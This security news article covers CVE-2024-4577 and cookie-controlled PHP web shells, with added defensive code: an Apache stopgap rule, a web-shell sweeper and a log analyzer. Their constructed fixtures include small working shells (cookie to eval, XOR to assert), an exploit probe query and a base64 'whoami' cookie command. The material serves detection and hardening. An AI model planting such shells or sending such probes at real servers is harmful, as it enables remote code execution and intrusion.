A threat actor doesn’t always need a zero-day exploit or a sophisticated toolchain to compromise a web server. Sometimes a cookie is enough.
Microsoft’s threat intelligence team recently disclosed the technical anatomy of a PHP-based attack chain that grants remote code execution through a mechanism so minimal it could easily be missed by conventional security monitoring. The vulnerability, tracked as CVE-2024-4577, affects PHP installations running in CGI mode on Windows systems. It was patched in June 2024. But exploitation in the wild has continued — and the tradecraft behind it is getting sharper.
According to The Hacker News, Microsoft detailed how attackers are using the flaw to install persistent backdoors that are controlled entirely through HTTP cookie values. The approach is notable for its stealth. No suspicious URL parameters. No encoded payloads in POST bodies. Just a cookie header carrying obfuscated instructions that the compromised server interprets and executes.
That’s the core of what makes this campaign dangerous. The command-and-control channel hides in plain sight, embedded in what looks like routine web traffic.
CVE-2024-4577 itself is an argument-injection flaw in php-cgi on Windows, rooted in character encoding. PHP's CGI handler already rejects query-string arguments that begin with an ASCII hyphen (the guard added after CVE-2012-1823), but Windows "Best-Fit" character mapping silently converts the soft-hyphen byte 0xAD into that same hyphen during command-line encoding conversion, after PHP's check has run. A query beginning with %AD followed by an option letter therefore reaches the PHP binary as a real command-line switch such as -d, which sets php.ini directives, and from there an unauthenticated web request becomes arbitrary code execution. The vulnerability was reported by Orange Tsai of DEVCORE and disclosed in coordination with the PHP maintainers. Fixes shipped in PHP 8.3.8, 8.2.20, and 8.1.29; end-of-life branches (8.0 and earlier) never received one. Yet, as is often the case, patch adoption has been uneven, leaving thousands of servers exposed months after the fix became available.
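For a server that cannot be upgraded immediately, the following is an added example of the stopgap of the kind DEVCORE's advisory described (Apache configuration written for this page, not taken from the article): reject any request whose query string starts with the URL-encoded soft hyphen that the bypass depends on.

```apache
# Stopgap only. It blocks the known %AD-prefixed query pattern; it does not fix
# php-cgi and is no substitute for upgrading to 8.3.8 / 8.2.20 / 8.1.29 or for
# taking php-cgi out of the request path altogether.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]
```

RewriteCond sees the raw, still-encoded query string, which is why the match is on the literal text %ad rather than on the decoded byte. A narrow rule like this is easy to sidestep if a variant moves the soft hyphen elsewhere in the query, so treat it as a delay tactic while the real fix is scheduled.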
Microsoft’s analysis, published by its Threat Intelligence team, goes beyond the initial exploitation vector. What caught researchers’ attention was the post-exploitation behavior — specifically, the way attackers established persistence and maintained access without deploying traditional malware binaries or command-line tools that would trigger endpoint detection.
The attack begins with exploitation of CVE-2024-4577 to drop a lightweight PHP web shell onto the target server. This shell doesn’t accept commands through GET or POST parameters, which are commonly logged and inspected by web application firewalls. Instead, it reads a specific cookie from incoming HTTP requests, decodes the value, and passes it to PHP’s eval() function. The result: arbitrary PHP code execution triggered by what appears, in most log files, to be a completely normal HTTP request.
Clever. And hard to detect.
The cookie-based control mechanism means that even organizations with decent network monitoring may not notice anything unusual. Standard intrusion detection systems tend to focus on URL strings, POST payloads, and known malicious user-agent strings. Cookies, while logged in some configurations, are frequently overlooked in automated analysis pipelines. The attackers clearly understood this blind spot.
Microsoft noted that the threat actors used this access for a range of follow-on activities: reconnaissance of the server environment, credential harvesting, lateral movement within the network, and in some cases, deployment of additional tooling for data exfiltration. The initial foothold — that tiny PHP shell — served as the launchpad for everything else.
The campaign isn’t attributed to a single threat group with high confidence, but Microsoft indicated that the activity clusters overlap with patterns previously associated with threat actors operating out of East Asia. Some of the infrastructure and tactics resemble groups that have historically targeted organizations in Japan, as well as educational institutions and technology firms across the Asia-Pacific region. Cisco’s Talos intelligence division had previously flagged exploitation of CVE-2024-4577 against Japanese organizations in early 2025, lending additional weight to the geographic focus. Part of that geography is baked into the bug itself: DEVCORE confirmed exploitation on Windows systems running the Traditional Chinese, Simplified Chinese, and Japanese locales, where the Best-Fit mapping behaves as the exploit needs, and could not rule out other locales and code pages.
So why does this matter now, nearly two years after the patch was released?
Because the attack surface hasn’t shrunk as much as it should have. PHP remains one of the most widely deployed server-side languages on the internet, powering roughly 75% of websites whose server-side language is known, according to W3Techs. The CGI configuration required for CVE-2024-4577 is a minority deployment pattern, most common in legacy Windows-based hosting environments, but it is not exotic: XAMPP for Windows, a common developer and small-business stack, exposes php-cgi through Apache in its default configuration. Against the sheer volume of PHP installations, even a small percentage of vulnerable servers represents a significant number of targets.
And the attackers know this. Scanning activity for CVE-2024-4577 has remained elevated throughout 2025, according to data from the Shadowserver Foundation, which tracks internet-wide exploitation attempts. The vulnerability consistently appears in top-exploited lists published by cybersecurity agencies, and CISA added it to its Known Exploited Vulnerabilities catalog within days of the patch, as soon as the first exploitation reports surfaced.
Microsoft’s technical write-up also highlights an operational security discipline among the attackers that goes beyond the cookie trick. The web shells observed were frequently modified between deployments — small changes in variable names, encoding schemes, and cookie key names that made static signature detection unreliable. Some variants used XOR encoding on the cookie payload. Others used base64 with custom alphabets. The mutations weren’t dramatic, but they were enough to evade hash-based detection and simple pattern matching.
This is a textbook example of what the security industry calls “living off the land” — but adapted for the web application layer. Rather than abusing native operating system tools like PowerShell or WMI, the attackers are living off PHP itself, using its built-in functions as weapons. The server does exactly what it’s designed to do: execute PHP code. The problem is who’s supplying that code.
The implications for defenders are uncomfortable. Traditional endpoint detection and response tools are designed for workstation and server operating systems, not for inspecting the semantic content of web application traffic at the cookie level. Web application firewalls can help, but only if they’re configured to inspect cookie values — and many default configurations don’t. Log analysis can surface anomalies, but only if cookie headers are being captured in the first place, which is far from universal.
What should organizations actually do? First, the obvious: patch. Any PHP installation on Windows running in CGI mode should have been updated long ago, but the persistence of exploitation activity suggests many haven’t been. Second, audit web server configurations. PHP-CGI on Windows is a legacy deployment model that most modern applications don’t require. PHP-FPM is not available for Windows, so on that platform the alternative is running PHP as an Apache module (mod_php) rather than as php-cgi; in every case, verify that php-cgi.exe is not reachable from the web root, as it is in a default XAMPP for Windows install. Third, hunt for web shells. Microsoft published indicators of compromise including file hashes and behavioral signatures for the cookie-parsing shells, but because the variants rotated names and encodings, the hashes will age quickly and the durable check is behavioral. Security teams should sweep web-accessible directories for PHP files that reference cookie values (or other request headers) in conjunction with eval(), assert(), or similar dynamic execution functions, and treat any such file outside the application’s known code base as suspect until proven otherwise.
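The sweep recommended in the third step above, as an added example written for this page rather than Microsoft's tooling or anything published with the article. It pairs a request source (a cookie or other header superglobal) with a dynamic-execution sink per file and deliberately ignores variable and cookie names, since those are exactly what the observed variants rotated. The PHP fixtures are constructed for illustration; the source, sink, and decoder patterns are assumptions about what a practitioner would look for, not an official signature.

```python
"""Sweep a web root for PHP files that read a request cookie or header and feed
something into a dynamic-execution sink. Added example, not Microsoft's or the
article's tooling; the PHP fixtures are constructed here for illustration."""
import re
import tempfile
from pathlib import Path

# Where a command can enter without touching the URL or body. $_COOKIE is the
# case the article describes; the header superglobals cover Accept-Language /
# Referer style variants of the same trick.
SOURCE_RE = re.compile(
    r"\$_COOKIE\b"
    r"|\$_SERVER\s*\[\s*['\"]HTTP_[A-Z_]+['\"]\s*\]"
    r"|\b(?:getallheaders|apache_request_headers)\s*\(",
    re.IGNORECASE,
)
# Functions that turn a string into executed PHP or an OS command.
SINK_RE = re.compile(
    r"\b(?:eval|assert|create_function|call_user_func(?:_array)?"
    r"|system|passthru|shell_exec|exec|popen|proc_open)\s*\(",
    re.IGNORECASE,
)
# Decoders and XOR loops of the kind the observed variants used to hide the
# payload. Only a severity hint: the source+sink pair is what flags a file.
DECODER_RE = re.compile(
    r"\b(?:base64_decode|str_rot13|gzinflate|gzuncompress|strrev|strtr|hex2bin)\s*\("
    r"|\^\s*(?:ord\s*\(|\$)",
    re.IGNORECASE,
)
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".php7", ".phar", ".inc"}


def scan_php_source(src: str) -> dict:
    """Classify one file's text. Names are ignored on purpose; structure is what matters."""
    sources = sorted({m.group(0) for m in SOURCE_RE.finditer(src)})
    sinks = sorted({m.group(0).rstrip("( \t") for m in SINK_RE.finditer(src)})
    return {
        "sources": sources,
        "sinks": sinks,
        "decoder": bool(DECODER_RE.search(src)),
        "suspicious": bool(sources) and bool(sinks),
    }


def sweep(root: Path) -> list:
    """(relative path, result) for every PHP-like file that pairs a source with a sink."""
    hits = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            result = scan_php_source(path.read_text(encoding="utf-8", errors="replace"))
            if result["suspicious"]:
                hits.append((path.relative_to(root).as_posix(), result))
    return hits


# Constructed fixtures, not real samples. Two mimic the shape the article
# describes (cookie in, decoder, dynamic execution); the other two are benign,
# including one that reads a cookie for a legitimate purpose.
FIXTURES = {
    "index.php": "<?php\nrequire 'vendor/autoload.php';\necho 'ok';\n",
    "prefs.php": (
        "<?php\n$theme = $_COOKIE['theme'] ?? 'light';\n"
        "echo '<body class=\"' . htmlspecialchars($theme) . '\">';\n"
    ),
    "cache/helper.php": (
        "<?php\nif (isset($_COOKIE['sid_tmp'])) {\n"
        "    @eval(base64_decode($_COOKIE['sid_tmp']));\n}\n"
    ),
    "uploads/img.php": (
        "<?php\n$k = 'q'; $d = $_SERVER['HTTP_COOKIE']; $o = '';\n"
        "for ($i = 0; $i < strlen($d); $i++) { $o .= chr(ord($d[$i]) ^ ord($k[$i % strlen($k)])); }\n"
        "@assert($o);\n"
    ),
}


def demo() -> list:
    """Write the fixtures into a temporary web root, sweep it, return the flagged paths."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, text in FIXTURES.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(text, encoding="utf-8")
        return [rel for rel, _ in sweep(root)]


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # real use: python sweep.py C:\xampp\htdocs
        for rel, result in sweep(Path(sys.argv[1])):
            print(rel, result["sources"], result["sinks"], "decoder" if result["decoder"] else "")
    else:
        print("flagged in constructed fixtures:", demo())
```

The benign prefs.php reads a cookie but never executes anything, so it stays quiet, while both shells are flagged regardless of what they call their variables or cookies. The obvious gap is string-assembled function names (a sink spelled as concatenated fragments), which a regex will not see; that is the point at which a behavioral scan should hand off to Microsoft's published IOCs and to a comparison against a known-good copy of the code base.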
Fourth, and this is where it gets harder, organizations need to reconsider what they’re logging. If HTTP cookie headers aren’t captured in web server access logs, an entire class of command-and-control activity becomes invisible. Neither Apache’s default combined log format nor IIS’s default W3C field selection records the Cookie header, though both can be configured to: Apache through a custom log format that includes the request header, IIS through its optional cookie log field. Enabling cookie logging introduces storage and privacy considerations, since session identifiers then land in log files that must be protected accordingly, but the alternative is flying blind against exactly this kind of threat.
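Once the Cookie header is in the log, the analysis is straightforward. The following is an added example written for this page, not Microsoft's tooling or anything from the article, and it goes slightly beyond the cookie channel by also flagging the initial CVE-2024-4577 probe in the same pass. It assumes an Apache log format that records the Cookie request header (the LogFormat shown in the docstring is an assumption), an allowlist of cookie names the application legitimately issues, and the constructed sample lines embedded below; none of those are from the page.

```python
"""Flag cookie-borne web-shell traffic and CVE-2024-4577 probes in web server
access logs. Added example, not Microsoft's or the article's tooling. It assumes
an Apache log format that records the Cookie request header, e.g.
    LogFormat "%h %t \\"%r\\" %>s %b \\"%{Cookie}i\\"" withcookie
(assumed format; IIS W3C logs with the cookie field enabled can be fed in the
same way after adjusting LINE_RE). The sample lines are constructed."""
import base64
import math
import re
from urllib.parse import urlsplit

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<cookie>[^"]*)"$'
)
# Cookie names the application itself issues. Assumed for this example; in
# practice, baseline it from the application's own Set-Cookie responses.
KNOWN_COOKIES = {"PHPSESSID", "theme"}
# Tokens that never belong inside a decoded cookie value.
PHP_TOKENS = re.compile(
    r"<\?php|\b(?:eval|assert|system|shell_exec|passthru|base64_decode)\s*\("
    r"|\$_(?:GET|POST|COOKIE|SERVER)\b"
)
# URL-encoded soft hyphen (0xAD) directly before an option letter: the Best-Fit
# encoding trick CVE-2024-4577 relies on. A UTF-8 soft hyphen would be %C2%AD.
SOFT_HYPHEN_ARG = re.compile(r"%ad[a-z]", re.IGNORECASE)
ENTROPY_MIN_LEN, ENTROPY_THRESHOLD = 24, 4.0  # tuned for this example only


def shannon_entropy(s: str) -> float:
    """Bits per character; random base64/XOR blobs sit well above hex session IDs."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decoded_php(value: str) -> bool:
    """True if the value is strict base64 whose plaintext carries PHP/shell tokens."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError; also covers bad padding
        return False
    return bool(PHP_TOKENS.search(raw.decode("latin-1")))


def analyze_cookie(name: str, value: str) -> list:
    """Reasons one cookie looks like a command channel rather than application state."""
    reasons = []
    if name not in KNOWN_COOKIES:
        reasons.append(f"cookie {name!r} is not issued by the application")
    if decoded_php(value):
        reasons.append(f"cookie {name!r} base64-decodes to PHP/shell code")
    if len(value) >= ENTROPY_MIN_LEN and shannon_entropy(value) > ENTROPY_THRESHOLD:
        reasons.append(f"cookie {name!r} is long and high-entropy ({shannon_entropy(value):.2f} bits/char)")
    return reasons


def analyze_line(line: str) -> list:
    """Reasons to look at one log line; an empty list means nothing stood out."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    if SOFT_HYPHEN_ARG.search(urlsplit(m["target"]).query):
        reasons.append("query string carries %AD before an option letter (CVE-2024-4577 probe)")
    if m["cookie"] and m["cookie"] != "-":
        for part in m["cookie"].split(";"):
            name, _, value = part.strip().partition("=")
            reasons.extend(analyze_cookie(name, value))
    return reasons


def analyze_log(lines: list) -> list:
    """(1-based line number, reasons) for every line that produced a finding."""
    return [(i, r) for i, line in enumerate(lines, 1) if (r := analyze_line(line))]


# Constructed sample log, not captured traffic. Line 1 is normal; 2 carries a
# base64 cookie command to a shell; 3 is an exploitation probe against an
# exposed php-cgi binary (a harmless directive is used here); 4 reuses a
# legitimate cookie name for an XOR/custom-alphabet blob that base64 rejects.
SAMPLE_LOG = [
    '203.0.113.7 [12/Mar/2025:10:14:02 +0000] "GET /index.php HTTP/1.1" 200 5123 '
    '"PHPSESSID=0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d; theme=dark"',
    '203.0.113.9 [12/Mar/2025:10:14:05 +0000] "GET /cache/helper.php HTTP/1.1" 200 61 '
    '"sid_tmp=c3lzdGVtKCd3aG9hbWknKTs="',
    '198.51.100.4 [12/Mar/2025:10:15:11 +0000] '
    '"GET /php-cgi/php-cgi.exe?%ADd+display_errors%3d1 HTTP/1.1" 200 412 "-"',
    '203.0.113.9 [12/Mar/2025:10:16:40 +0000] "GET /uploads/img.php HTTP/1.1" 200 44 '
    '"theme=x9Lw2f7Pq3Rt8Vb1Nc5Mh4Jy6Gk0WdZs~aE!uIoH"',
]

if __name__ == "__main__":
    for lineno, reasons in analyze_log(SAMPLE_LOG):
        print(f"line {lineno}: " + "; ".join(reasons))
```

The three cookie checks are layered on purpose. The allowlist catches a shell that invents its own cookie name, the base64 check catches the plainest variants, and the entropy check is what remains when a variant switches to XOR or a custom alphabet and hides behind a legitimate name, as line 4 does. The soft-hyphen rule sits in the same pass because the probe and the cookie traffic that follows it are two halves of one intrusion; correlate by client address and by the path that first answered the probe.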
The broader pattern here isn’t new. Attackers have long favored web shells as persistence mechanisms because they’re lightweight, flexible, and blend into the application environment. What’s evolving is the sophistication of the control channels. Moving from URL parameters to POST bodies to cookies represents a steady migration toward less-inspected parts of the HTTP protocol. The logical next step, one that some researchers have already demonstrated in proof-of-concept work, is command delivery through headers like Accept-Language or Referer, fields that are almost never subjected to security inspection. Any detection built around cookies should be written to cover those headers as well, or it will be obsolete by the next variant.
Microsoft’s disclosure is a reminder that vulnerability management doesn’t end with a CVE number and a patch release. The real story plays out in the months and years afterward, as attackers refine their exploitation techniques against the long tail of unpatched systems. CVE-2024-4577 isn’t a new vulnerability. But the tradecraft built on top of it is still maturing.
And that’s the part that should worry defenders most.


WebProNews is an iEntry Publication